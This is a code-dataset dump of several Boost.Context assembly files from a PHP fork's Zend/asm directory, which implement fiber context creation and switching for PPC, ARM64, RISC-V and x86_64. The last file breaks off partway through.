repo_id
stringlengths 5
115
| size
int64 590
5.01M
| file_path
stringlengths 4
212
| content
stringlengths 590
5.01M
|
|---|---|---|---|
Aidam7/PHavirP
| 5,227
|
Zend/asm/make_ppc32_sysv_elf_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* |bchai|hiddn| fpscr | PC | CR | R14 | R15 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R16 | R17 | R18 | R19 | R20 | R21 | R22 | R23 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R24 | R25 | R26 | R27 | R28 | R29 | R30 | R31 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | F14 | F15 | F16 | F17 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | F18 | F19 | F20 | F21 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | F22 | F23 | F24 | F25 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | F26 | F27 | F28 | F29 | *
* ------------------------------------------------- *
* ------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | *
* ------------------------------------- *
* | F30 | F31 |bchai| LR | *
* ------------------------------------- *
* *
*******************************************************/
.file "make_ppc32_sysv_elf_gas.S"
.text
.globl make_fcontext
.align 2
.type make_fcontext,@function
# fcontext_t make_fcontext( void * sp, size_t size, void (* fn)( transfer_t ) );
# PPC32 SysV ELF: R3 = top of context-stack, R4 = stack size (not used here),
# R5 = context-function. Returns a pointer to the initialized context-data in R3.
make_fcontext:
# save return address into R6
mflr %r6
# first arg of make_fcontext() == top address of context-stack
# shift address in R3 to lower 16 byte boundary
clrrwi %r3, %r3, 4
# reserve space on context-stack, including 16 bytes of linkage
# and parameter area + 240 bytes of context-data (R1 % 16 == 0)
subi %r3, %r3, 16 + 240
# third arg of make_fcontext() == address of context-function
#ifdef __linux__
# save context-function as PC (offset 16 of the context record)
stw %r5, 16(%r3)
#else
# save context-function for trampoline (slot just above the context record)
stw %r5, 248(%r3)
#endif
# set back-chain to zero
li %r0, 0
stw %r0, 240(%r3)
# copy FPSCR to new context
mffs %f0
stfd %f0, 8(%r3)
#ifdef __linux__
# set hidden pointer for returning transfer_t
la %r0, 248(%r3)
stw %r0, 4(%r3)
#endif
# load address of label 1 into R4 (bl/mflr pattern yields the current PC)
bl 1f
1: mflr %r4
#ifndef __linux__
# compute abs address of trampoline, use as PC
addi %r7, %r4, trampoline - 1b
stw %r7, 16(%r3)
#endif
# compute abs address of label finish
addi %r4, %r4, finish - 1b
# save address of finish as return-address for context-function
# will be entered after context-function returns
stw %r4, 244(%r3)
# restore return address from R6
mtlr %r6
blr # return pointer to context-data
#ifndef __linux__
trampoline:
# On systems other than Linux, jump_fcontext is returning the
# transfer_t in R3:R4, but we need to pass transfer_t * R3 to
# our context-function.
lwz %r0, 8(%r1) # address of context-function
mtctr %r0
stw %r3, 8(%r1)
stw %r4, 12(%r1)
la %r3, 8(%r1) # address of transfer_t
bctr
#endif
finish:
# Use the secure PLT for _exit(0). If we use the insecure BSS PLT
# here, then the linker may use the insecure BSS PLT even if the
# C++ compiler wanted the secure PLT.
# set R30 for secure PLT, large model
bl 2f
2: mflr %r30
addis %r30, %r30, .Ltoc - 2b@ha
addi %r30, %r30, .Ltoc - 2b@l
# call _exit(0) with special addend 0x8000 for large model
li %r3, 0
bl _exit + 0x8000@plt
.size make_fcontext, .-make_fcontext
/* Provide the GOT pointer for secure PLT, large model. */
.section .got2,"aw"
.Ltoc = . + 0x8000
/* Mark that we don't need executable stack. */
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 3,716
|
Zend/asm/make_arm64_aapcs_elf_gas.S
|
/*
Copyright Edward Nevill + Oliver Kowalke 2015
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10| 0x14| 0x18| 0x1c| *
* ------------------------------------------------- *
* | d8 | d9 | d10 | d11 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 0x20| 0x24| 0x28| 0x2c| 0x30| 0x34| 0x38| 0x3c| *
* ------------------------------------------------- *
* | d12 | d13 | d14 | d15 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 0x40| 0x44| 0x48| 0x4c| 0x50| 0x54| 0x58| 0x5c| *
* ------------------------------------------------- *
* | x19 | x20 | x21 | x22 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 0x60| 0x64| 0x68| 0x6c| 0x70| 0x74| 0x78| 0x7c| *
* ------------------------------------------------- *
* | x23 | x24 | x25 | x26 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 0x80| 0x84| 0x88| 0x8c| 0x90| 0x94| 0x98| 0x9c| *
* ------------------------------------------------- *
* | x27 | x28 | FP | LR | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | | | *
* ------------------------------------------------- *
* | 0xa0| 0xa4| 0xa8| 0xac| | | *
* ------------------------------------------------- *
* | PC | align | | | *
* ------------------------------------------------- *
* *
*******************************************************/
.file "make_arm64_aapcs_elf_gas.S"
.text
.align 2
.global make_fcontext
.type make_fcontext, %function
# fcontext_t make_fcontext( void * sp, size_t size, void (* fn)( transfer_t ) );
# AAPCS64: x0 = top of context-stack, x1 = stack size (not used here),
# x2 = context-function. Returns pointer to the context-data in x0.
make_fcontext:
# shift address in x0 (allocated stack) to lower 16 byte boundary
and x0, x0, ~0xF
# reserve space for context-data on context-stack (0xb0 bytes, see layout above)
sub x0, x0, #0xb0
# third arg of make_fcontext() == address of context-function
# store address as a PC to jump in
str x2, [x0, #0xa0]
# save address of finish as return-address for context-function
# will be entered after context-function returns (LR register)
adr x1, finish
str x1, [x0, #0x98]
ret x30 // return pointer to context-data (x0)
finish:
# exit code is zero
mov x0, #0
# exit application
bl _exit
.size make_fcontext,.-make_fcontext
# Mark that we don't need executable stack.
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 4,090
|
Zend/asm/jump_arm64_aapcs_macho_gas.S
|
/*
Copyright Edward Nevill + Oliver Kowalke 2015
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10| 0x14| 0x18| 0x1c| *
* ------------------------------------------------- *
* | d8 | d9 | d10 | d11 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 0x20| 0x24| 0x28| 0x2c| 0x30| 0x34| 0x38| 0x3c| *
* ------------------------------------------------- *
* | d12 | d13 | d14 | d15 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 0x40| 0x44| 0x48| 0x4c| 0x50| 0x54| 0x58| 0x5c| *
* ------------------------------------------------- *
* | x19 | x20 | x21 | x22 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 0x60| 0x64| 0x68| 0x6c| 0x70| 0x74| 0x78| 0x7c| *
* ------------------------------------------------- *
* | x23 | x24 | x25 | x26 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 0x80| 0x84| 0x88| 0x8c| 0x90| 0x94| 0x98| 0x9c| *
* ------------------------------------------------- *
* | x27 | x28 | FP | LR | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | | | *
* ------------------------------------------------- *
* | 0xa0| 0xa4| 0xa8| 0xac| | | *
* ------------------------------------------------- *
* | PC | align | | | *
* ------------------------------------------------- *
* *
*******************************************************/
.text
.globl _jump_fcontext
.balign 16
; transfer_t jump_fcontext( fcontext_t const to, void * vp );
; AArch64 Mach-O: x0 = target context, x1 = data pointer.
; Saves the callee-saved state on the current stack, switches SP to the
; target context-data and resumes it; transfer_t is returned in x0/x1.
_jump_fcontext:
; prepare stack for GP + FPU
sub sp, sp, #0xb0
; save d8 - d15 (callee-saved low halves of v8-v15)
stp d8, d9, [sp, #0x00]
stp d10, d11, [sp, #0x10]
stp d12, d13, [sp, #0x20]
stp d14, d15, [sp, #0x30]
; save x19-x30
stp x19, x20, [sp, #0x40]
stp x21, x22, [sp, #0x50]
stp x23, x24, [sp, #0x60]
stp x25, x26, [sp, #0x70]
stp x27, x28, [sp, #0x80]
stp fp, lr, [sp, #0x90]
; save LR as PC
str lr, [sp, #0xa0]
; keep SP (pointing to the just-saved context-data) in X4
mov x4, sp
; switch SP to the target context-data (first arg, X0)
mov sp, x0
; load d8 - d15
ldp d8, d9, [sp, #0x00]
ldp d10, d11, [sp, #0x10]
ldp d12, d13, [sp, #0x20]
ldp d14, d15, [sp, #0x30]
; load x19-x30
ldp x19, x20, [sp, #0x40]
ldp x21, x22, [sp, #0x50]
ldp x23, x24, [sp, #0x60]
ldp x25, x26, [sp, #0x70]
ldp x27, x28, [sp, #0x80]
ldp fp, lr, [sp, #0x90]
; return transfer_t from jump
; pass transfer_t as first arg in context function
; X0 == FCTX, X1 == DATA
mov x0, x4
; load pc
ldr x4, [sp, #0xa0]
; restore stack from GP + FPU
add sp, sp, #0xb0
ret x4
|
Aidam7/PHavirP
| 4,275
|
Zend/asm/jump_arm64_aapcs_elf_gas.S
|
/*
Copyright Edward Nevill + Oliver Kowalke 2015
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10| 0x14| 0x18| 0x1c| *
* ------------------------------------------------- *
* | d8 | d9 | d10 | d11 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 0x20| 0x24| 0x28| 0x2c| 0x30| 0x34| 0x38| 0x3c| *
* ------------------------------------------------- *
* | d12 | d13 | d14 | d15 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 0x40| 0x44| 0x48| 0x4c| 0x50| 0x54| 0x58| 0x5c| *
* ------------------------------------------------- *
* | x19 | x20 | x21 | x22 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 0x60| 0x64| 0x68| 0x6c| 0x70| 0x74| 0x78| 0x7c| *
* ------------------------------------------------- *
* | x23 | x24 | x25 | x26 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 0x80| 0x84| 0x88| 0x8c| 0x90| 0x94| 0x98| 0x9c| *
* ------------------------------------------------- *
* | x27 | x28 | FP | LR | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | | | *
* ------------------------------------------------- *
* | 0xa0| 0xa4| 0xa8| 0xac| | | *
* ------------------------------------------------- *
* | PC | align | | | *
* ------------------------------------------------- *
* *
*******************************************************/
.file "jump_arm64_aapcs_elf_gas.S"
.text
.align 2
.global jump_fcontext
.type jump_fcontext, %function
# transfer_t jump_fcontext( fcontext_t const to, void * vp );
# AAPCS64: x0 = target context, x1 = data pointer.
# Saves the callee-saved state on the current stack, switches SP to the
# target context-data and resumes it; transfer_t is returned in x0/x1.
jump_fcontext:
# prepare stack for GP + FPU
sub sp, sp, #0xb0
# save d8 - d15 (callee-saved low halves of v8-v15)
stp d8, d9, [sp, #0x00]
stp d10, d11, [sp, #0x10]
stp d12, d13, [sp, #0x20]
stp d14, d15, [sp, #0x30]
# save x19-x30
stp x19, x20, [sp, #0x40]
stp x21, x22, [sp, #0x50]
stp x23, x24, [sp, #0x60]
stp x25, x26, [sp, #0x70]
stp x27, x28, [sp, #0x80]
stp x29, x30, [sp, #0x90]
# save LR as PC
str x30, [sp, #0xa0]
# keep SP (pointing to the just-saved context-data) in X4
mov x4, sp
# switch SP to the target context-data (first arg, X0)
mov sp, x0
# load d8 - d15
ldp d8, d9, [sp, #0x00]
ldp d10, d11, [sp, #0x10]
ldp d12, d13, [sp, #0x20]
ldp d14, d15, [sp, #0x30]
# load x19-x30
ldp x19, x20, [sp, #0x40]
ldp x21, x22, [sp, #0x50]
ldp x23, x24, [sp, #0x60]
ldp x25, x26, [sp, #0x70]
ldp x27, x28, [sp, #0x80]
ldp x29, x30, [sp, #0x90]
# return transfer_t from jump
# pass transfer_t as first arg in context function
# X0 == FCTX, X1 == DATA
mov x0, x4
# load pc
ldr x4, [sp, #0xa0]
# restore stack from GP + FPU
add sp, sp, #0xb0
ret x4
.size jump_fcontext,.-jump_fcontext
# Mark that we don't need executable stack.
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 5,103
|
Zend/asm/jump_riscv64_sysv_elf_gas.S
|
/*
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10| 0x14| 0x18| 0x1c| *
* ------------------------------------------------- *
* | fs0 | fs1 | fs2 | fs3 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 0x20| 0x24| 0x28| 0x2c| 0x30| 0x34| 0x38| 0x3c| *
* ------------------------------------------------- *
* | fs4 | fs5 | fs6 | fs7 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 0x40| 0x44| 0x48| 0x4c| 0x50| 0x54| 0x58| 0x5c| *
* ------------------------------------------------- *
* | fs8 | fs9 | fs10 | fs11 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 0x60| 0x64| 0x68| 0x6c| 0x70| 0x74| 0x78| 0x7c| *
* ------------------------------------------------- *
* | s0 | s1 | s2 | s3 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 0x80| 0x84| 0x88| 0x8c| 0x90| 0x94| 0x98| 0x9c| *
* ------------------------------------------------- *
* | s4 | s5 | s6 | s7 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 0xa0| 0xa4| 0xa8| 0xac| 0xb0| 0xb4| 0xb8| 0xbc| *
* ------------------------------------------------- *
* | s8 | s9 | s10 | s11 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 48 | 49 | 50 | 51 | | | | | *
* ------------------------------------------------- *
* | 0xc0| 0xc4| 0xc8| 0xcc| | | | | *
* ------------------------------------------------- *
* | ra | pc | | | *
* ------------------------------------------------- *
* *
*******************************************************/
.file "jump_riscv64_sysv_elf_gas.S"
.text
.align 1
.global jump_fcontext
.type jump_fcontext, %function
# transfer_t jump_fcontext( fcontext_t const to, void * vp );
# RV64 LP64D: a0 = target context, a1 = data pointer.
# Saves the callee-saved state on the current stack, switches SP to the
# target context-data and resumes it; transfer_t is returned in a0/a1.
jump_fcontext:
# prepare stack for GP + FPU
addi sp, sp, -0xd0
# save fs0 - fs11 (callee-saved FP registers)
fsd fs0, 0x00(sp)
fsd fs1, 0x08(sp)
fsd fs2, 0x10(sp)
fsd fs3, 0x18(sp)
fsd fs4, 0x20(sp)
fsd fs5, 0x28(sp)
fsd fs6, 0x30(sp)
fsd fs7, 0x38(sp)
fsd fs8, 0x40(sp)
fsd fs9, 0x48(sp)
fsd fs10, 0x50(sp)
fsd fs11, 0x58(sp)
# save s0-s11, ra
sd s0, 0x60(sp)
sd s1, 0x68(sp)
sd s2, 0x70(sp)
sd s3, 0x78(sp)
sd s4, 0x80(sp)
sd s5, 0x88(sp)
sd s6, 0x90(sp)
sd s7, 0x98(sp)
sd s8, 0xa0(sp)
sd s9, 0xa8(sp)
sd s10, 0xb0(sp)
sd s11, 0xb8(sp)
sd ra, 0xc0(sp)
# save RA a second time, as the PC to resume at
sd ra, 0xc8(sp)
# keep SP (pointing to the just-saved context-data) in A2
mv a2, sp
# switch SP to the target context-data (first arg, A0)
mv sp, a0
# load fs0 - fs11
fld fs0, 0x00(sp)
fld fs1, 0x08(sp)
fld fs2, 0x10(sp)
fld fs3, 0x18(sp)
fld fs4, 0x20(sp)
fld fs5, 0x28(sp)
fld fs6, 0x30(sp)
fld fs7, 0x38(sp)
fld fs8, 0x40(sp)
fld fs9, 0x48(sp)
fld fs10, 0x50(sp)
fld fs11, 0x58(sp)
# load s0-s11,ra
ld s0, 0x60(sp)
ld s1, 0x68(sp)
ld s2, 0x70(sp)
ld s3, 0x78(sp)
ld s4, 0x80(sp)
ld s5, 0x88(sp)
ld s6, 0x90(sp)
ld s7, 0x98(sp)
ld s8, 0xa0(sp)
ld s9, 0xa8(sp)
ld s10, 0xb0(sp)
ld s11, 0xb8(sp)
ld ra, 0xc0(sp)
# return transfer_t from jump
# pass transfer_t as first arg in context function
# a0 == FCTX, a1 == DATA
mv a0, a2
# load pc
ld a2, 0xc8(sp)
# restore stack from GP + FPU
addi sp, sp, 0xd0
jr a2
.size jump_fcontext,.-jump_fcontext
# Mark that we don't need executable stack.
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 6,030
|
Zend/asm/jump_ppc64_sysv_xcoff_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* | TOC | R14 | R15 | R16 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R17 | R18 | R19 | R20 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R21 | R22 | R23 | R24 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | R25 | R26 | R27 | R28 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | R29 | R30 | R31 | hidden | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | CR | LR | PC | back-chain| *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | cr saved | lr saved | compiler | linker | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | TOC saved | FCTX | DATA | | *
* ------------------------------------------------- *
* *
*******************************************************/
.file "jump_ppc64_sysv_xcoff_gas.S"
.toc
.csect .text[PR], 5
.align 2
.globl jump_fcontext[DS]
.globl .jump_fcontext
.csect jump_fcontext[DS], 3
jump_fcontext:
.llong .jump_fcontext[PR], TOC[tc0], 0
.csect .text[PR], 5
# transfer_t jump_fcontext( fcontext_t const to, void * vp );
# PPC64 XCOFF: R3 = hidden pointer for the returned transfer_t,
# R4 = target context, R5 = data pointer (see layout diagram above).
.jump_fcontext:
# reserve space on stack
subi 1, 1, 184
std 2, 0(1) # save TOC
std 14, 8(1) # save R14
std 15, 16(1) # save R15
std 16, 24(1) # save R16
std 17, 32(1) # save R17
std 18, 40(1) # save R18
std 19, 48(1) # save R19
std 20, 56(1) # save R20
std 21, 64(1) # save R21
std 22, 72(1) # save R22
std 23, 80(1) # save R23
std 24, 88(1) # save R24
std 25, 96(1) # save R25
std 26, 104(1) # save R26
std 27, 112(1) # save R27
std 28, 120(1) # save R28
std 29, 128(1) # save R29
std 30, 136(1) # save R30
std 31, 144(1) # save R31
std 3, 152(1) # save hidden
# save CR
mfcr 0
std 0, 160(1)
# save LR
mflr 0
std 0, 168(1)
# save LR as PC
std 0, 176(1)
# keep SP (pointing to the just-saved context-data) in R6
mr 6, 1
# switch SP to the target context-data (second arg, R4)
mr 1, 4
ld 2, 0(1) # restore TOC
ld 14, 8(1) # restore R14
ld 15, 16(1) # restore R15
ld 16, 24(1) # restore R16
ld 17, 32(1) # restore R17
ld 18, 40(1) # restore R18
ld 19, 48(1) # restore R19
ld 20, 56(1) # restore R20
ld 21, 64(1) # restore R21
ld 22, 72(1) # restore R22
ld 23, 80(1) # restore R23
ld 24, 88(1) # restore R24
ld 25, 96(1) # restore R25
ld 26, 104(1) # restore R26
ld 27, 112(1) # restore R27
ld 28, 120(1) # restore R28
ld 29, 128(1) # restore R29
ld 30, 136(1) # restore R30
ld 31, 144(1) # restore R31
ld 3, 152(1) # restore hidden
# restore CR
ld 0, 160(1)
mtcr 0
# restore LR
ld 0, 168(1)
mtlr 0
# load PC
ld 0, 176(1)
# set CTR to the saved PC for the indirect jump below
mtctr 0
# adjust stack
addi 1, 1, 184
# zero in r3 indicates first jump to context-function
cmpdi 3, 0
beq use_entry_arg
# return transfer_t
std 6, 0(3)
std 5, 8(3)
# jump to context
bctr
use_entry_arg:
# copy transfer_t into transfer_fn arg registers
mr 3, 6
mr 4, 5
# jump to context
bctr
|
Aidam7/PHavirP
| 3,231
|
Zend/asm/make_x86_64_sysv_macho_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/****************************************************************************************
* *
* ---------------------------------------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ---------------------------------------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10 | 0x14 | 0x18 | 0x1c | *
* ---------------------------------------------------------------------------------- *
* | fc_mxcsr|fc_x87_cw| R12 | R13 | R14 | *
* ---------------------------------------------------------------------------------- *
* ---------------------------------------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ---------------------------------------------------------------------------------- *
* | 0x20 | 0x24 | 0x28 | 0x2c | 0x30 | 0x34 | 0x38 | 0x3c | *
* ---------------------------------------------------------------------------------- *
* | R15 | RBX | RBP | RIP | *
* ---------------------------------------------------------------------------------- *
* *
****************************************************************************************/
.text
.globl _make_fcontext
.align 8
/* fcontext_t make_fcontext( void * sp, size_t size, void (* fn)( transfer_t ) ); */
/* SysV AMD64 / Mach-O: RDI = top of context-stack, RSI = size (not used here), */
/* RDX = context-function. Returns pointer to the context-data in RAX.          */
_make_fcontext:
/* first arg of make_fcontext() == top of context-stack */
movq %rdi, %rax
/* shift address in RAX to lower 16 byte boundary */
andq $-16, %rax
/* reserve space for context-data on context-stack */
/* on context-function entry: (RSP -0x8) % 16 == 0 */
leaq -0x40(%rax), %rax
/* third arg of make_fcontext() == address of context-function */
/* stored in the RBX slot of the context record (offset 0x28)   */
movq %rdx, 0x28(%rax)
/* save SSE control- and status-word (MXCSR) */
stmxcsr (%rax)
/* save x87 control-word */
fnstcw 0x4(%rax)
/* compute abs address of label trampoline */
leaq trampoline(%rip), %rcx
/* save address of trampoline as return-address for context-function */
/* will be entered after calling jump_fcontext() first time */
movq %rcx, 0x38(%rax)
/* compute abs address of label finish */
leaq finish(%rip), %rcx
/* save address of finish as return-address for context-function */
/* will be entered after context-function returns */
movq %rcx, 0x30(%rax)
ret /* return pointer to context-data */
trampoline:
/* store return address on stack */
/* fix stack alignment */
push %rbp
/* jump to context-function */
jmp *%rbx
finish:
/* exit code is zero */
xorq %rdi, %rdi
/* exit application; __exit is the Mach-O-mangled name of _exit */
call __exit
hlt
|
Aidam7/PHavirP
| 4,655
|
Zend/asm/make_ppc32_sysv_xcoff_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* |bchai| CR | LR |compl| link| TOC | R14 | R15 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R16 | R17 | R18 | R19 | R20 | R21 | R22 | R23 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R24 | R25 | R26 | R27 | R28 | R29 | R30 | R31 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | F14 | F15 | F16 | F17 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | F18 | F19 | F20 | F21 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | F22 | F23 | F24 | F25 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | F26 | F27 | F28 | F29 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | F30 | F31 | PC |hiddn| fpscr | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 256 | 260 | 264 | 268 | 272 | 276 | 280 | 284 | *
* ------------------------------------------------- *
* |bchai|savLR|savLR|compl| link|svTOC| FCTX| DATA| *
* ------------------------------------------------- *
* *
*******************************************************/
.file "make_ppc32_sysv_xcoff_xas.S"
.toc
.csect .text[PR]
.align 2
.globl make_fcontext[DS]
.globl .make_fcontext
.csect make_fcontext[DS]
make_fcontext:
.long .make_fcontext[PR], TOC[tc0], 0
.csect .text[PR], 5
# fcontext_t make_fcontext( void * sp, size_t size, void (* fn)( transfer_t ) );
# AIX XCOFF / PPC32: R3 = top of context-stack, R4 = stack size (not used here),
